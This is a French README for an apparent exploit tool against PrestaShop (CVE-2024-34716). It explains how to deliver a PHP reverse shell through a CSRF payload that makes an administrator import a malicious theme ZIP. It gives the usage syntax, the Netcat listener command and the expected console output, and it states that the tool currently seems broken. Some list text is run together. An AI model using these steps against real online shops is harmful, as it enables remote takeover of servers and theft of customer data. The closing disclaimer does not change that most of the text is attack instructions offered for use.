
Automatise une attaque CSRF contre CVE-2024-34716 afin de déployer un reverse shell PHP sur PrestaShop, avec empaquetage automatisé de la charge utile et configuration du listener Netcat.
Ce script automatise une exploitation CSRF (Cross-Site Request Forgery) pour téléverser un reverse shell PHP sur le serveur web d'une cible et l'exécuter. Le reverse shell est livré sous forme de fichier ZIP via une charge utile CSRF conçue, qui est déclenchée lorsqu'un utilisateur privilégié interagit avec un point d'accès spécifique. Le script nécessite une instance Netcat en écoute pour capturer la connexion du reverse shell.
Semble cassé pour le moment, sera mis à jour plus tard
./exploit.sh <url_cible> <point_d_accès_admin> <email_admin> <ip_attaquant>
url_cible : URL de base de la cible (ex. https://example.com).point_d_accès_admin : Chemin vers le point d'accès d'importation de thème admin.email_admin : Adresse e-mail d'un administrateur (à usurper pour la charge utile).ip_attaquant : Adresse IP où l'écouteur du reverse shell recevra la connexion../exploit.sh https://victime.com /admin-panel [email protected] 192.168.1.10
ip_attaquant et le port 9001 fournis.love.php) est compressé dans Love-exploit.zip.csrf_payload.html) contenant un script JavaScript pour soumettre automatiquement une requête malveillante au panneau d'administration de la cible afin d'importer le reverse shell.8000 sert Love-exploit.zip pour que la cible l'importe.Démarrez un écouteur Netcat sur votre machine :
nc -nvlp 9001
Exécutez le script :
./exploit.sh https://victime.com /admin-panel [email protected] 192.168.1.10
Attendez que la cible exécute la charge utile CSRF et recevez la connexion du reverse shell.
Le script affiche les informations suivantes pendant l'exécution :
8000 (serveur HTTP) et 9001 (écouteur Netcat) sont libres avant d'exécuter le script.[*] Assurez-vous que Netcat est en écoute : nc -nvlp 9001
[*] Attente de l'écouteur Netcat...
[*] Création du reverse shell PHP...
[*] Packaging du shell sous Love-exploit.zip...
[*] Récupération du jeton CSRF...
[+] Jeton CSRF récupéré : <valeur_jeton>
[*] Construction de la charge utile HTML pour CSRF...
[*] Conversion du HTML en PNG...
[*] Vérification de l'existence d'un serveur HTTP sur le port 8000...
[*] Démarrage d'un nouveau serveur HTTP sur le port 8000 pour la livraison de la charge utile...
[*] Téléversement de la charge utile XSS pour déclencher la CSRF...
[*] Maintien du script en cours d'exécution pour surveiller les connexions entrantes...
Ce document est destiné à être utilisé par des testeurs d'intrusion et des chercheurs en cybersécurité dans des environnements contrôlés. Toute utilisation abusive de cet outil à des fins non autorisées est strictement interdite.
Ce script est uniquement destiné à des fins éducatives et à des évaluations légales de cybersécurité. Toute utilisation non autorisée contre un système sans permission est illégale et contraire aux principes éthiques.